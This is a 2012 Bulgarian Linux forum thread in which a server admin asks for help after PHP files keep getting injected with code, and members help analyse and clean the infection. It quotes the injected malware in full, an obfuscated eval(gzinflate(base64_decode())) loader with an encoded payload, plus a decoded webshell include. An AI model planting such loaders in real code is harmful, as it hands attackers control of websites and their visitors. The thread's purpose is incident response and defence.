Linux за българи: Форуми

Linux секция за напреднали => Хардуерни и софтуерни проблеми => Темата е започната от: mishot в Sep 05, 2012, 08:15



Титла: Пробив в сигурността на уеб сървър
Публикувано от: mishot в Sep 05, 2012, 08:15
Здравейте,
имам следния проблем:
По някакъв начин(още не съм разбрал как) в началото на всеки php файл се добавя следния код:
<?php
$md5 = "0920e84df32218bdeb31c1c2ae0cf0fc";
$a3 = array('(','d',"4",'$','t',";",'c','e','r','l',"z",')',"i",'6','n',"f","b","o",'a','s','g',"_",'v');
$b33 = create_function('$'.'v',$a3[7].$a3[22].$a3[18].$a3[9].$a3[0].$a3[20].$a3[10].$a3[12].$a3[14].$a3[15].$a3[9].$a3[18].$a3[4].$a3[7].$a3[0].$a3[16].$a3[18].$a3[19].$a3[7].$a3[13].$a3[2].$a3[21].$a3[1].$a3[7].$a3[6].$a3[17].$a3[1].$a3[7].$a3[0].$a3[3].$a3[22].$a3[11].$a3[11].$a3[11].$a3[5]);
$b33('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');
?>

Не знам какво точно прави кода, но спира правилната работа на сайтовете.
Вчера възстанових всички сайтове от бекъпа и всичко си работеше добре. Днес сутринта кода беше добавен отново навсякъде.

Някакви идеи как да го спра? Вирус ли е някакъв?
Дайте идея, как да проверя рекурсивно във всички php файлове за, да речем низа b33(да съм сигурен, че кода не е останал някъде)
clamav и rkhunter - не откриват нищо

Сървъра е с Fedora 14, httpd-2.2.17-1

едит:

сега забелязах в логовете, че се опитват да влязат през proftp с различни потребители(някаква база ползват явно, защото потребителите са в азбучен ред) - спрях proftpd


Титла: Re: Пробив в сигурността на уеб сървър
Публикувано от: clovenhoof в Sep 05, 2012, 09:43
Код:
$b33 = create_function('$'.'v',$a3[7].$a3[22].$a3[18].$a3[9].$a3[0].$a3[20].$a3[10].$a3[12].$a3[14].$a3[15].$a3[9].$a3[18].$a3[4].$a3[7].$a3[0].$a3[16].$a3[18].$a3[19].$a3[7].$a3[13].$a3[2].$a3[21].$a3[1].$a3[7].$a3[6].$a3[17].$a3[1].$a3[7].$a3[0].$a3[3].$a3[22].$a3[11].$a3[11].$a3[11].$a3[5]);

Горното всъщност е: eval(gzinflate(base64_decode($v))); Създава функция която се извиква на следващият ред:

$b33('DZa.....

Аргумента е код който eval изпълнява при всяко зареждане на страницата и понеже е криптиран (аргумента/кода) не се разбира какво точно прави.

Може да си направиш малък пример и да изпълниш gzinflate(base64_decode($v)) на PHP и да го echo-неш за да видиш какъв код се изпълнява без твоето желание.

ПП: Т.е. с echo няма директно да стане, но има начини да покажеш PHP код като текст на уеб страница.


Титла: Re: Пробив в сигурността на уеб сървър
Публикувано от: Neo2SHYAlien в Sep 05, 2012, 10:00
За да си провериш всички файлове за b33 пробвай това
Код
GeSHi (Bash):
  1. find / -type f -print0 | xargs -0 grep -l "b33"


Титла: Re: Пробив в сигурността на уеб сървър
Публикувано от: neter в Sep 05, 2012, 10:02
Няма нужда да се търси 'b33' на този етап - дори да си почистиш кода от тази функция, пак ще ти го добавят. Направо да видим кода (и без това си е публикуван тук), за да говорим нататък
Код
GeSHi (PHP):
  1. if (function_exists('ob_start') && !isset($GLOBALS['mfsn'])) {
  2. $GLOBALS['mfsn'] = '/var/www/html/wizitka/new/templates/vertikalni/5/pharmacy/26f.php';
  3. if (file_exists($GLOBALS['mfsn'])) {
  4. include_once($GLOBALS['mfsn']);
  5. if (function_exists('gml') && function_exists('dgobh')) {
  6. ob_start('dgobh');
  7. }
  8. }
  9. }

Виж какво има в указания файл. Сподели и с нас, ако нямаш някаква пречка. След това ще е нужно здраво да се заровиш в логовете на всички услуги (включително и ssh), които имаш (си имал) пуснати на тази машина, и да се опиташ да намериш къде и с какво се е случило влизането. Някъде имаш оставена вратичка, но ще ни е малко трудно така на сляпо да те упътим къде е.


Титла: Re: Пробив в сигурността на уеб сървър
Публикувано от: Neo2SHYAlien в Sep 05, 2012, 10:13
Няма нужда да се търси 'b33' на този етап - дори да си почистиш кода от тази функция, пак ще ти го добавят.
Поне може да види от къде влиза ако е четим файла или ако не е използван base64 иначе дам няма много смисъл.


Титла: Re: Пробив в сигурността на уеб сървър
Публикувано от: niakoi в Sep 05, 2012, 10:29
имах подобен проблем преди 2-3 години. колежката имаше вирусче, имаше си запазени пароли за фтп на сайта ни и... така

по-скоро виж кой юзър (ако имаш възможност) го е променял за последно

поздрави
нас


Титла: Re: Пробив в сигурността на уеб сървър
Публикувано от: mishot в Sep 05, 2012, 10:49
Няма нужда да се търси 'b33' на този етап - дори да си почистиш кода от тази функция, пак ще ти го добавят. Направо да видим кода (и без това си е публикуван тук), за да говорим нататък
Код
GeSHi (PHP):
  1. if (function_exists('ob_start') && !isset($GLOBALS['mfsn'])) {
  2. $GLOBALS['mfsn'] = '/var/www/html/wizitka/new/templates/vertikalni/5/pharmacy/26f.php';
  3. if (file_exists($GLOBALS['mfsn'])) {
  4. include_once($GLOBALS['mfsn']);
  5. if (function_exists('gml') && function_exists('dgobh')) {
  6. ob_start('dgobh');
  7. }
  8. }
  9. }

Виж какво има в указания файл. Сподели и с нас, ако нямаш някаква пречка. След това ще е нужно здраво да се заровиш в логовете на всички услуги (включително и ssh), които имаш (си имал) пуснати на тази машина, и да се опиташ да намериш къде и с какво се е случило влизането. Някъде имаш оставена вратичка, но ще ни е малко трудно така на сляпо да те упътим къде е.

Няма как да видя какво съдържа файла, защото директорията NEW беше временна, за одобрения на няколко вертикални темплейта и сутринта я затрих, за да не я възстановявам и нея.

това видях засега в лога:
Sep  4 04:39:45 webserver proftpd[21621]: 127.0.0.1 (::ffff:61.160.211.4[::ffff:61.160.211.4]) - USER aaron: no such user found from ::ffff:61.160.211.4 [::ffff:61.160.211.4]
Sep  4 04:39:47 webserver proftpd[21622]: 127.0.0.1 (::ffff:61.160.211.4[::ffff:61.160.211.4]) - USER abbott: no such user found from ::ffff:61.160.211.4 [::ffff:61.160.211.4]
Sep  4 04:39:48 webserver proftpd[21623]: 127.0.0.1 (::ffff:61.160.211.4[::ffff:61.160.211.4]) - USER abel: no such user found from ::ffff:61.160.211.4 [::ffff:61.160.211.4]
Sep  4 04:39:50 webserver proftpd[21624]: 127.0.0.1 (::ffff:61.160.211.4[::ffff:61.160.211.4]) - USER abner: no such user found from ::ffff:61.160.211.4 [::ffff:61.160.211.4]
Sep  4 04:39:52 webserver proftpd[21625]: 127.0.0.1 (::ffff:61.160.211.4[::ffff:61.160.211.4]) - USER abraham: no such user found from ::ffff:61.160.211.4 [::ffff:61.160.211.4]
Sep  4 07:54:49 webserver proftpd[23156]: 127.0.0.1 (::ffff:61.160.211.4[::ffff:61.160.211.4]) - USER aaron: no such user found from ::ffff:61.160.211.4 [::ffff:61.160.211.4]
Sep  4 07:54:51 webserver proftpd[23157]: 127.0.0.1 (::ffff:61.160.211.4[::ffff:61.160.211.4]) - USER abbott: no such user found from ::ffff:61.160.211.4 [::ffff:61.160.211.4]
Sep  4 07:54:53 webserver proftpd[23158]: 127.0.0.1 (::ffff:61.160.211.4[::ffff:61.160.211.4]) - USER abel: no such user found from ::ffff:61.160.211.4 [::ffff:61.160.211.4]
Sep  4 07:54:55 webserver proftpd[23159]: 127.0.0.1 (::ffff:61.160.211.4[::ffff:61.160.211.4]) - USER abner: no such user found from ::ffff:61.160.211.4 [::ffff:61.160.211.4]

това е част от лога, започват от A-Z(всякакви комбинации)

изхода от nmap:

#  nmap -v 192.168.0.1

Starting Nmap 5.21 ( http://nmap.org ) at 2012-09-05 10:56 EEST
Initiating Parallel DNS resolution of 1 host. at 10:56
Completed Parallel DNS resolution of 1 host. at 10:56, 0.00s elapsed
Initiating SYN Stealth Scan at 10:56
Scanning 192.168.0.1 [1000 ports]
Discovered open port 443/tcp on 192.168.0.1
Discovered open port 111/tcp on 192.168.0.1
Discovered open port 139/tcp on 192.168.0.1
Discovered open port 445/tcp on 192.168.0.1
Discovered open port 80/tcp on 192.168.0.1
Discovered open port 3306/tcp on 192.168.0.1
Discovered open port 3128/tcp on 192.168.0.1
Completed SYN Stealth Scan at 10:56, 0.03s elapsed (1000 total ports)
Nmap scan report for 192.168.0.1
Host is up (0.0000090s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
80/tcp   open  http
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
443/tcp  open  https
445/tcp  open  microsoft-ds
3128/tcp open  squid-http
3306/tcp open  mysql

До момента съм спрял FTP сървъра и съм забранил всички потребители, които имат отношение.

За да си провериш всички файлове за b33 пробвай това
Код
GeSHi (Bash):
  1. find / -type f -print0 | xargs -0 grep -l "b33"

Има ли как да търси само в php файлове?
Как да видя всички php модифицирани на определена дата?

Благодаря предварително на всички!


Титла: Re: Пробив в сигурността на уеб сървър
Публикувано от: morbid_viper в Sep 05, 2012, 11:28
случва се от време на време с някоя купешка платворма за форум, блог, CMS  или нещо подобно. оставил си някоя стара версия и като са я надушили са получили достъп до файловата ти система.
това може да се поограничи като смениш правата на файловете, които се сервират да са с други права от потребителя, с който работи уеб сървъра. поне да не може да се пише с wwwrun (да речем).
естествено, това не винаги е приложимо. просто не знам как използваш сървъра си. ако трябва 100 човека да качват някакви неща през уеб си е по-пипкаво да се занимаваш с правата.
при нас всички такива „външни“ системи са отделени на други машини


Титла: Re: Пробив в сигурността на уеб сървър
Публикувано от: Neo2SHYAlien в Sep 05, 2012, 11:46
Има ли как да търси само в php файлове?

Код
GeSHi (Bash):
  1. find / -name '*.php' -type f -print0 | xargs -0 grep -l "b33"

Добра идея е да ползваш modsecurity ($2)


Титла: Re: Пробив в сигурността на уеб сървър
Публикувано от: mishot в Sep 05, 2012, 11:57
това е файла


Титла: Re: Пробив в сигурността на уеб сървър
Публикувано от: n00b в Sep 05, 2012, 12:16
тъй като съм сърбал тази попара... вижте да не би да са влезли през phpmyadmin. Бедния има МНОГО дупки!!!


Титла: Re: Пробив в сигурността на уеб сървър
Публикувано от: neter в Sep 05, 2012, 13:27
това е файла
Мда, webshell-че, очакваше се. През него са добавяли по-горната функция към PHP файловете, след като си я махал. Остава да намериш откъде е качен. Ако нямаш някаква функционалност на сайта, свързана с качване на файлове, и ако нямаш публичен достъп до административни инструменти като phpmyadmin, webmin и т.н., то първо търси следата някъде из FTP логовете (между другото, ProFTPD също има някоя и друга дупка в сигурността). Ако намериш следа там, спираш FTP сървъра (вече си го направил), изчистваш си кода от проблемната функция по гореописаните начини с find и приключваш с въпроса засега. Ако не намериш никаква следа в FTP-то, почва едно голямо търсене на дупка в кода на сайта. Ако е някаква готова CMS система, по-добре инсталирай на чисто последната версия (надяваме се, че текущата дупка я няма в тази версия). Надграждането (вместо чиста нова инсталация на CMS-a) в някои случаи може да остави дупка от старата версия и в новата версия (този риск предимно идва от инсталираните добавки към CMS-а). Ако сайтът ти е писан от някого, на когото си платил, даваш му задачата да търси дупката. Ако сам си си го писал или считаш, че имаш достатъчно познания да се ровиш в чужд код, ти пожелавам успех :)

П.П.: А, и не забравяй все пак да махнеш файла на webshell-а! Потърси го и в други копия из папките. Смело можеш да хванеш някакъв текст от оригиналния файл и да търсиш за файлове със същия текст - съдържанието на всички файлове с webshell най-вероятно ще е едно и също - кракерите обикновено качват само по един webshell. И едва ли има нужда да претърсваш цялата файлова система - засега не си казал за признаци да е действано нещо извън папките, до които Apache потребителят има достъп за писане.


Титла: Re: Пробив в сигурността на уеб сървър
Публикувано от: Neo2SHYAlien в Sep 05, 2012, 13:39
Освен дупката е добре да повишиш сигурността в системата си, има много начини и ако са се добрали до root достъп ще стане кочинка. Виждам че си със стара версия на федорка за нея пускат ли се пачове по сигурността ??


Титла: Re: Пробив в сигурността на уеб сървър
Публикувано от: ddantgwyn в Sep 05, 2012, 14:04
Освен дупката е добре да повишиш сигурността в системата си, има много начини и ако са се добрали до root достъп ще стане кочинка. Виждам че си със стара версия на федорка за нея пускат ли се пачове по сигурността ??

ами отдавна не.

аз бих попитал дали сървъра е в продукция, защото ако не е, по-добре да изключва брутално машината от мрежата и да се захваща да прави пълна ревизия на системата. а ако не му се занимава, направо да я забърсва и да инсталира един centos 6.3 на мястото на Fedora. а ако машината е в продукция -- да слагат временно някаква на нейно място (ако нямат равностойна замяна) и пак да използват centos. ревизията е интересна да се разбере какво и как точно са пробили, но Fedora 14 беше на дневен ред преди почти две години, така че аз не бих проявил чак такъв академичен интерес, особено ако машината е важна и трябва да е непрекъснато на линия.

предлагам centos защото той е най-близко до fedora, но при добро желание може да използват и Red Hat EL :)


Титла: Re: Пробив в сигурността на уеб сървър
Публикувано от: Neo2SHYAlien в Sep 05, 2012, 14:20
ами отдавна не.
Лошо в такъв случай може някой дупкав сървис да са изчаластрили спокойно.

//off
Много ме дразнят тия RHEL производни че не позволяват dist-upgrade


Титла: Re: Пробив в сигурността на уеб сървър
Публикувано от: dejuren в Sep 05, 2012, 14:35
http://www.spenneberg.org/chkrootkit-mirror/
http://www.rootkit.nl/projects/rootkit_hunter.html

Най-добрия план в такава ситуация - преинсталация с нова версия на всичко + връщане на сайта от бекъп и замяна на сървъра (или само на диска му).


Титла: Re: Пробив в сигурността на уеб сървър
Публикувано от: mishot в Sep 05, 2012, 15:14
към момента изчистих кода от файловете + спрян FTP + инсталирах mod_secure

продължавам да следя за промени


Благодаря на всички за помощта


Титла: Re: Пробив в сигурността на уеб сървър
Публикувано от: Neo2SHYAlien в Sep 05, 2012, 17:11
най важното е да намериш как са влезли за да запушиш дупката


Титла: Re: Пробив в сигурността на уеб сървър
Публикувано от: ddantgwyn в Sep 05, 2012, 21:27
ами отдавна не.
Лошо в такъв случай може някой дупкав сървис да са изчаластрили спокойно.

най-вероятно точно така е станало.

Цитат
//off
Много ме дразнят тия RHEL производни че не позволяват dist-upgrade

е, въпрос на вкус е :)

аз лично не предпочитам dist-upgrade. доколкото знам, поддръжката на Centos 6 (а предполагам и на RHEL 5) ще е поне 10 години, така че веднъж на 10 години мога да си направя труда да инсталирам отново -- иначе се губят навици и умения ;)


Титла: Re: Пробив в сигурността на уеб сървър
Публикувано от: ddantgwyn в Sep 05, 2012, 21:28
http://www.spenneberg.org/chkrootkit-mirror/
http://www.rootkit.nl/projects/rootkit_hunter.html

Най-добрия план в такава ситуация - преинсталация с нова версия на всичко + връщане на сайта от бекъп и замяна на сървъра (или само на диска му).

 +1 [_]3


Титла: Re: Пробив в сигурността на уеб сървър
Публикувано от: savago в Sep 05, 2012, 21:30
За да ти пише по фаиловете значи има права ! Провери си директорията/ийте, и фаиловете за това кой е писал по тях.
Идея е да си добавиш в disable_functions на php.ini exec,system,shell_exec ...
Според мен имаш качен уебшел.


Титла: Re: Пробив в сигурността на уеб сървър
Публикувано от: Neo2SHYAlien в Sep 05, 2012, 23:03

е, въпрос на вкус е :)

аз лично не предпочитам dist-upgrade. доколкото знам, поддръжката на Centos 6 (а предполагам и на RHEL 5) ще е поне 10 години, така че веднъж на 10 години мога да си направя труда да инсталирам отново -- иначе се губят навици и умения ;)
тука съм готов да поспоря. Първо няма много умения в една инсталация, по скоро в настройктие но като правиш преинсталация обикновено си прехвърляш конфа като за по лесно. Отделно че след 10 години като изтече времето на съпорт тогава Debian/Slac-а ми ще са на 10+ години без преинсталация и не претендират за гръмкото име enterprise :) Не е много enterprise да спираш преинсталираш и прочие не може да се избегне ама все пак идеята е да се сведе това до минимум.


Титла: Re: Пробив в сигурността на уеб сървър
Публикувано от: ddantgwyn в Sep 05, 2012, 23:57

е, въпрос на вкус е :)

аз лично не предпочитам dist-upgrade. доколкото знам, поддръжката на Centos 6 (а предполагам и на RHEL 5) ще е поне 10 години, така че веднъж на 10 години мога да си направя труда да инсталирам отново -- иначе се губят навици и умения ;)
тука съм готов да поспоря. Първо няма много умения в една инсталация, по скоро в настройктие но като правиш преинсталация обикновено си прехвърляш конфа като за по лесно. Отделно че след 10 години като изтече времето на съпорт тогава Debian/Slac-а ми ще са на 10+ години без преинсталация и не претендират за гръмкото име enterprise :) Не е много enterprise да спираш преинсталираш и прочие не може да се избегне ама все пак идеята е да се сведе това до минимум.

Ами давай тогава -- много обичам да предизвиквам флеймове ;)

Това за знанията и уменията е казано фигуративно -- приеми, че говоря за навици и умения при конфигуриране на системата (макар, че понятието „резервни копия“ също ми е известно).

Второ, за престоя на някой сървър за преинсталация -- ако имам сървър, който е работил 10 години без проблеми, при изтичането на поддръжката на дистрибуцията, която ползвам, най-вероятно той вече ще е хардуерна антика и най-логичното ще е да бъде сменен с нов такъв. От там нататък е ясно как се процедира.

Да не говорим, че една минимална инсталация на Red Hat EL 6/Centos 6/Scientific Linux е по-малко от 30 минути. Още толкова сложи за качването на специфични пакети, които ти трябват допълнително. И ако имаш резервно копие на /etc и всичкото останало конфигурационни файлове, може за час и половина да имаш възстановена система, годна за работа и то направена на ръка. А ако си по-окумуш администратор и си създал скриптове за тази работа, даже може да успееш и за по-кратко време да си готов (imho).

Освен всичко друго, dist-upgrade е перфектната ситуация за демонстриране действието на някои от законите на Мърфи.

Та така, както казах -- въпрос на вкус :D


Титла: Re: Пробив в сигурността на уеб сървър
Публикувано от: go_fire в Sep 06, 2012, 14:21
ddantgwyn да не забравяме, че Дебиан, не е Убунту и там е гарантирано, че надграждането във версия ще протече по план. Нали точно за това са тия многомесечни замразявания и не знам си какво, дето толкова дразнят потребителите. Те са, за да се гарантира, че всичко е отстраненио, издялкано, полирано и „клиента“ получава марка Дебиан.


Титла: Re: Пробив в сигурността на уеб сървър
Публикувано от: ddantgwyn в Sep 06, 2012, 18:48
ddantgwyn да не забравяме, че Дебиан, не е Убунту и там е гарантирано, че надграждането във версия ще протече по план. Нали точно за това са тия многомесечни замразявания и не знам си какво, дето толкова дразнят потребителите. Те са, за да се гарантира, че всичко е отстраненио, издялкано, полирано и „клиента“ получава марка Дебиан.

хайде сега, флейм ли се опитваш да създадеш :)

акцентът ми е на друго място, а не върху дистрибуциите -- при 10 години живот на една дистрибуция, в момента в който изтече поддръжката и, обикновено желязото и вече е достатъчно остаряло за да бъде подменено и то.

чисто инженерен подход и може би донякъде разлика във философията ;)


Титла: Re: Пробив в сигурността на уеб сървър
Публикувано от: go_fire в Sep 06, 2012, 18:57
За съжаление Дебиан не е „корпоративен“ и никой доброволно не се занимава с поддръжка за декада. Поддръжката е до следващата версия. В исторически план това се е движило между 1,5 и 3 години.

Флейм с теб би ме било страх да водя  :P


Титла: Re: Пробив в сигурността на уеб сървър
Публикувано от: Bogo в Sep 08, 2012, 17:33
това видях засега в лога:
Sep  4 04:39:45 webserver proftpd[21621]: 127.0.0.1 (::ffff:61.160.211.4[::ffff:61.160.211.4]) - USER aaron: no such user found from ::ffff:61.160.211.4 [::ffff:61.160.211.4]
Sep  4 04:39:47 webserver proftpd[21622]: 127.0.0.1 (::ffff:61.160.211.4[::ffff:61.160.211.4]) - USER abbott: no such user found from ::ffff:61.160.211.4 [::ffff:61.160.211.4]
Sep  4 04:39:48 webserver proftpd[21623]: 127.0.0.1 (::ffff:61.160.211.4[::ffff:61.160.211.4]) - USER abel: no such user found from ::ffff:61.160.211.4 [::ffff:61.160.211.4]
Sep  4 04:39:50 webserver proftpd[21624]: 127.0.0.1 (::ffff:61.160.211.4[::ffff:61.160.211.4]) - USER abner: no such user found from ::ffff:61.160.211.4 [::ffff:61.160.211.4]
Sep  4 04:39:52 webserver proftpd[21625]: 127.0.0.1 (::ffff:61.160.211.4[::ffff:61.160.211.4]) - USER abraham: no such user found from ::ffff:61.160.211.4 [::ffff:61.160.211.4]
Sep  4 07:54:49 webserver proftpd[23156]: 127.0.0.1 (::ffff:61.160.211.4[::ffff:61.160.211.4]) - USER aaron: no such user found from ::ffff:61.160.211.4 [::ffff:61.160.211.4]
Sep  4 07:54:51 webserver proftpd[23157]: 127.0.0.1 (::ffff:61.160.211.4[::ffff:61.160.211.4]) - USER abbott: no such user found from ::ffff:61.160.211.4 [::ffff:61.160.211.4]
Sep  4 07:54:53 webserver proftpd[23158]: 127.0.0.1 (::ffff:61.160.211.4[::ffff:61.160.211.4]) - USER abel: no such user found from ::ffff:61.160.211.4 [::ffff:61.160.211.4]
Sep  4 07:54:55 webserver proftpd[23159]: 127.0.0.1 (::ffff:61.160.211.4[::ffff:61.160.211.4]) - USER abner: no such user found from ::ffff:61.160.211.4 [::ffff:61.160.211.4]

това е част от лога, започват от A-Z(всякакви комбинации)

Имаш ли инсталиран фаил2бан ?


Титла: Re: Пробив в сигурността на уеб сървър
Публикувано от: ddantgwyn в Sep 08, 2012, 20:37
За съжаление Дебиан не е „корпоративен“ и никой доброволно не се занимава с поддръжка за декада. Поддръжката е до следващата версия. В исторически план това се е движило между 1,5 и 3 години.

аха, започваш да схващаш  ;)

но за твое успокоение ще кажа, че Debian е единствената друга дистрибуция, която има моето уважение. И единствената причина да не я ползвам е чисто хронологическа -- първо започнах с Red Hat и така си и останах на rpm базираните дистрибуции.

Цитат
Флейм с теб би ме било страх да водя  :P

даже и на няколко ракии?! това не мога да го повярвам :D


Титла: Re: Пробив в сигурността на уеб сървър
Публикувано от: go_fire в Sep 08, 2012, 20:45
5.т.


Както ти казах на друго място (сещаш се кое) теб те имам доста високо в йерархията, приемам те за мой, много важен учител. Дори пиян (а нямам толкоз пари да се напия) не бих посегнал. Учителя е нещо свещено.

Ще дам пример с някой тук, дето няма да назова, но ще се сетиш. Той пребивава в ЧР. Знае повече, от колкото ще науча за пет живота. Но този някой има много лошо отношение към всичко, в което вярвам. От него съм научил само, че съществува xv.

В миналото много се дърпах с него. Сега не го правя, защото това е безсмислено. Нито той ще си промени позицията, нито аз ще го уважавам, хептем пък страничен няма да разбере, за какво иде реч.


Титла: Re: Пробив в сигурността на уеб сървър
Публикувано от: ddantgwyn в Sep 08, 2012, 21:47
5.т.


Както ти казах на друго място (сещаш се кое) теб те имам доста високо в йерархията, приемам те за мой, много важен учител. Дори пиян (а нямам толкоз пари да се напия) не бих посегнал. Учителя е нещо свещено.

Ще дам пример с някой тук, дето няма да назова, но ще се сетиш. Той пребивава в ЧР. Знае повече, от колкото ще науча за пет живота. Но този някой има много лошо отношение към всичко, в което вярвам. От него съм научил само, че съществува xv.

В миналото много се дърпах с него. Сега не го правя, защото това е безсмислено. Нито той ще си промени позицията, нито аз ще го уважавам, хептем пък страничен няма да разбере, за какво иде реч.

[_]3

но спирам дотук, че рискувам марчето пак да ме скастри за разводняване на тема и ще е права този път ;)

надявам се образът с пробива в сигурността да се е оправил сравнително лесно и безболезнено.


Титла: Re: Пробив в сигурността на уеб сървър
Публикувано от: mishot в Sep 10, 2012, 09:23
това видях засега в лога:
Sep  4 04:39:45 webserver proftpd[21621]: 127.0.0.1 (::ffff:61.160.211.4[::ffff:61.160.211.4]) - USER aaron: no such user found from ::ffff:61.160.211.4 [::ffff:61.160.211.4]
Sep  4 04:39:47 webserver proftpd[21622]: 127.0.0.1 (::ffff:61.160.211.4[::ffff:61.160.211.4]) - USER abbott: no such user found from ::ffff:61.160.211.4 [::ffff:61.160.211.4]
Sep  4 04:39:48 webserver proftpd[21623]: 127.0.0.1 (::ffff:61.160.211.4[::ffff:61.160.211.4]) - USER abel: no such user found from ::ffff:61.160.211.4 [::ffff:61.160.211.4]
Sep  4 04:39:50 webserver proftpd[21624]: 127.0.0.1 (::ffff:61.160.211.4[::ffff:61.160.211.4]) - USER abner: no such user found from ::ffff:61.160.211.4 [::ffff:61.160.211.4]
Sep  4 04:39:52 webserver proftpd[21625]: 127.0.0.1 (::ffff:61.160.211.4[::ffff:61.160.211.4]) - USER abraham: no such user found from ::ffff:61.160.211.4 [::ffff:61.160.211.4]
Sep  4 07:54:49 webserver proftpd[23156]: 127.0.0.1 (::ffff:61.160.211.4[::ffff:61.160.211.4]) - USER aaron: no such user found from ::ffff:61.160.211.4 [::ffff:61.160.211.4]
Sep  4 07:54:51 webserver proftpd[23157]: 127.0.0.1 (::ffff:61.160.211.4[::ffff:61.160.211.4]) - USER abbott: no such user found from ::ffff:61.160.211.4 [::ffff:61.160.211.4]
Sep  4 07:54:53 webserver proftpd[23158]: 127.0.0.1 (::ffff:61.160.211.4[::ffff:61.160.211.4]) - USER abel: no such user found from ::ffff:61.160.211.4 [::ffff:61.160.211.4]
Sep  4 07:54:55 webserver proftpd[23159]: 127.0.0.1 (::ffff:61.160.211.4[::ffff:61.160.211.4]) - USER abner: no such user found from ::ffff:61.160.211.4 [::ffff:61.160.211.4]

това е част от лога, започват от A-Z(всякакви комбинации)

Имаш ли инсталиран фаил2бан ?

Има fail2ban
Засега сървъра работи коректно и кода не е добавян.

Може ли някой да ми каже как да претърся директорията на уебсървъра(/vaw/www/html) за файлове БЕЗ разширение?


Титла: Re: Пробив в сигурността на уеб сървър
Публикувано от: neter в Sep 10, 2012, 09:53
Може ли някой да ми каже как да претърся директорията на уебсървъра(/vaw/www/html) за файлове БЕЗ разширение?
Като се има предвид, че разширението на файла не е нищо повече от разделена с точка малка част от името на файла в края, е много относителна разликата между файлове с "разширение" и файлове, в името на които се съдържа точка. Надявам се търсене на файлове, в името на които не се съдържа точка, да ти е достатъчно. Ето един вариант за такова търсене
Цитат
